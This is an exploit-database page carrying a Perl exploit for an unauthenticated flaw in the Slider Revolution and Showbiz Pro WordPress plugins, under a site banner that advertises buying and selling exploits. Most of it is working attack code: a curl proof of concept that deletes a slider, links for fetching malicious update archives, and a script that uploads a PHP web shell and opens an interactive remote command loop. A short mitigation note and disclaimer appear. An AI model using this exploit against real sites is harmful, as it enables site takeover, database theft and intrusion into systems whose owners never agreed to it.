0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Slider Revolution/Showbiz Pro Shell Upload Exploit
[#!/usr/bin/perl
#
# Title: Slider Revolution/Showbiz Pro shell upload exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered: 15 October 2014
# Coded: 15 October 2014
# Updated: 25 November 2014
# Published: 25 November 2014
# MorXploit Research
# http://www.MorXploit.com
# Vendor: ThemePunch
# Vendor url: http://themepunch.com
# Software: Revslider/Showbiz Pro
# Versions: <= 3.0.95 (Revslider) / Version: <= 1.7.1 (Showbiz Pro)
# Products url:
# http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
# http://codecanyon.net/item/showbiz-pro-responsive-teaser-wordpress-plugin/4720988
# Vulnerable scripts:
# revslider/revslider_admin.php
# showbiz/showbiz_admin.php
#
# About the plugins:
# The #1 Slider plugin, used by millions, slider revolution is an all-purpose slide displaying solution that allows for showing almost any
# kind of content whith highly customizable, transitions, effects and custom animations.
# Showbiz Pro is a responsive teaser displaying solution that allows you to show WordPress Posts or any Custom Content with a set
# amount of teaser items.
#
# Description:
# Slider Revolution and Showbiz Pro fail to check authentication in revslider_admin.php/showbiz_admin.php allowing an unauthenticated
# attacker to abuse administrative features.
# Some of the features include:
# Creating/Deleting/Updating sliders
# Importing/exporting sliders
# Updading plugin
# For a full list of functions please see revslider_admin.php/showbiz_admin.php
#
# PoC on revslider:
# 1- Deleting a slider:
# root@host:/home/rootuser# curl -v --data "action=revslider_ajax_action&client_action=delete_slider&data[sliderid]=1"
# http://****.com/wp-admin/admin-ajax.php
# * Connected to ****.com (**.**.**.**) port 80 (#0)
# > POST /wp-admin/admin-ajax.php HTTP/1.1
# > User-Agent: curl/7.35.0
# > Host: ****.com
# > Accept: */*
# > Content-Length: 73
# > Content-Type: application/x-www-form-urlencoded
# >
# * upload completely sent off: 73 out of 73 bytes
# < HTTP/1.1 200 OK
# < Date: Fri, 24 Oct 2014 23:25:07 GMT
# * Server Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 is not blacklisted
# < Server: Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
# < X-Powered-By: PHP/5.4.18
# < X-Robots-Tag: noindex
# < X-Content-Type-Options: nosniff
# < Expires: Wed, 11 Jan 1984 05:00:00 GMT
# < Cache-Control: no-cache, must-revalidate, max-age=0
# < Pragma: no-cache
# < X-Frame-Options: SAMEORIGIN
# < Set-Cookie: PHPSESSID=a23ex1c8a573f1d1xd28c301793ba022c; path=/
# < Transfer-Encoding: chunked
# < Content-Type: text/html; charset=UTF-8
# <
# * Connection #0 to host http://****.com left intact
#
# {"success":true,"message":"The slider deleted","is_redirect":true,"redirect_url":"http:\/\/****.com\/wp-admin\/admin.php?page=revslider&view=sliders"}
#
# 2- Uploading an web shell:
# The following perl exploit will try to upload an HTTP php shell through the the update_plugin function
# To use the exploit make sure you download first the revslider.zip and showbiz.zip files which contain cmd.php
# http://www.morxploit.com/morxploits/revslider.zip
# http://www.morxploit.com/morxploits/showbiz.zip
# and save them it in the same directory where you have the exploit.
#
# Demo:
# perl morxrev.pl http://localhost revslider
# ===================================================
# --- Revslider/Showbiz shell upload exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ===================================================
# [*] Target set to revslider
# [*] MorXploiting http://localhost
# [*] Sent payload
# [+] Payload successfully executed
# [*] Checking if shell was uploaded
# [+] Shell successfully uploaded
#
# Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
# www-data@MorXploit:~$
#
# Download:
# Exploit:
# http://www.morxploit.com/morxploits/morxrevbiz.pl
# Exploit update zip files:
# http://www.morxploit.com/morxploits/revslider.zip
# http://www.morxploit.com/morxploits/showbiz.zip
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Mitigation:
# Besides the recently LFI vulnerability that was published couple months ago, this is another vulnerability that revslider developers have
# decided to patch without releasing a full security advisory, leaving thousands of revslider users who didn't update their plugin to the
# latest version (=> 3.0.96) vulnerable to this nasty flaw, revsliders developers will argue the fact that their slider comes with an
# auto-update feature, but the problem is that this plugin is bundled with a lot of themes, which means that those themes users may not get
# plugin updates or will have to pay to get the update. In other words revslider developers believe that every user should have the
# auto-update feature on, otherwise ... you are screwed.
# Obviously this is way more critical than the LFI vulnerability because it allows shell access giving attackers access to the target system
# as well as the ability to dump the entire wordpress database locally.
# That being said, upgrade immediately to the latest version or disable/switch to another plugin.
# As for Showbiz Pro, sadly the vulnerability has never been patched as we successfully exploited it in the latest version (1.7.1).
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use or damage. Use at your own risk.
#
# Got comments or questions?
# Simo_at_MorXploit_dot_com
#
# Did you like this exploit?
# Feel free to buy me a beer =)
# My btc address: 1Ko12CUAFoWn8syrvg4aQokFedNiwD6d7u
# Cheers!
use LWP::UserAgent;
use MIME::Base64;
use strict;
sub banner {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "===================================================\n";
print "--- Revslider/Showbiz shell upload exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
}
if (!defined ($ARGV[0] && $ARGV[1])) {
banner();
print "perl $0 <target> <plugin>\n";
print "perl $0 http://localhost revslider\n";
print "perl $0 http://localhost showbiz\n";
exit;
}
my $zip1 = "revslider.zip";
my $zip2 = "showbiz.zip";
unless (-e ($zip1 && $zip2))
{
banner();
print "[-] $zip1 or $zip2 not found! RTFM\n";
exit;
}
my $host = $ARGV[0];
my $plugin = $ARGV[1];
my $action;
my $update_file;
if ($plugin eq "revslider") {
$action = "revslider_ajax_action";
$update_file = "$zip1";
}
elsif ($plugin eq "showbiz") {
$action = "showbiz_ajax_action";
$update_file = "$zip2";
}
else {
banner();
print "[-] Wrong plugin name\n";
print "perl $0 <target> <plugin>\n";
print "perl $0 http://localhost revslider\n";
print "perl $0 http://localhost showbiz\n";
exit;
}
my $target = "wp-admin/admin-ajax.php";
my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php";
sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
my $useragent = randomagent();
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent($useragent);
my $status = $ua->get("$host/$target");
unless ($status->is_success) {
banner();
print "[-] Xploit failed: " . $status->status_line . "\n";
exit;
}
banner();
print "[*] Target set to $plugin\n";
print "[*] MorXploiting $host\n";
my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);
print "[*] Sent payload\n";
if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
print "[+] Payload successfully executed\n";
}
elsif ($exploit->decoded_content =~ /Wrong request/) {
print "[-] Payload failed: Not vulnerable\n";
exit;
}
elsif ($exploit->decoded_content =~ m/0$/) {
print "[-] Payload failed: Plugin unavailable\n";
exit;
}
else {
$exploit->decoded_content =~ /<\/b>(.*?)<br>/;
print "[-] Payload failed:$1\n";
print "[-] " . $exploit->decoded_content unless (defined $1);
print "\n";
exit;
}
print "[*] Checking if shell was uploaded\n";
sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] }
my $rndstr = rndstr(8, 1..9, 'a'..'z');
my $cmd1 = encode_base64("echo $rndstr");
my $status = $ua->get("$host/$shell?cmd=$cmd1");
if ($status->decoded_content =~ /system\(\) has been disabled/) {
print "[-] Xploit failed: system() has been disabled\n";
exit;
}
elsif ($status->decoded_content !~ /$rndstr/) {
print "[-] Xploit failed: " . $status->status_line . "\n";
exit;
}
elsif ($status->decoded_content =~ /$rndstr/) {
print "[+] Shell successfully uploaded\n";
}
my $cmd2 = encode_base64("whoami");
my $whoami = $ua->get("$host/$shell?cmd=$cmd2");
my $cmd3 = encode_base64("uname -n");
my $uname = $ua->get("$host/$shell?cmd=$cmd3");
my $cmd4 = encode_base64("id");
my $id = $ua->get("$host/$shell?cmd=$cmd4");
my $cmd5 = encode_base64("uname -a");
my $unamea = $ua->get("$host/$shell?cmd=$cmd5");
print $unamea->decoded_content;
print $id->decoded_content;
my $wa = $whoami->decoded_content;
my $un = $uname->decoded_content;
chomp($wa);
chomp($un);
while () {
print "\n$wa\@$un:~\$ ";
chomp(my $cmd=<STDIN>);
if ($cmd eq "exit")
{
print "Aurevoir!\n";
exit;
}
my $ucmd = encode_base64("$cmd");
my $output = $ua->get("$host/$shell?cmd=$ucmd");
print $output->decoded_content;
}
# 0day.today [2024-11-14] #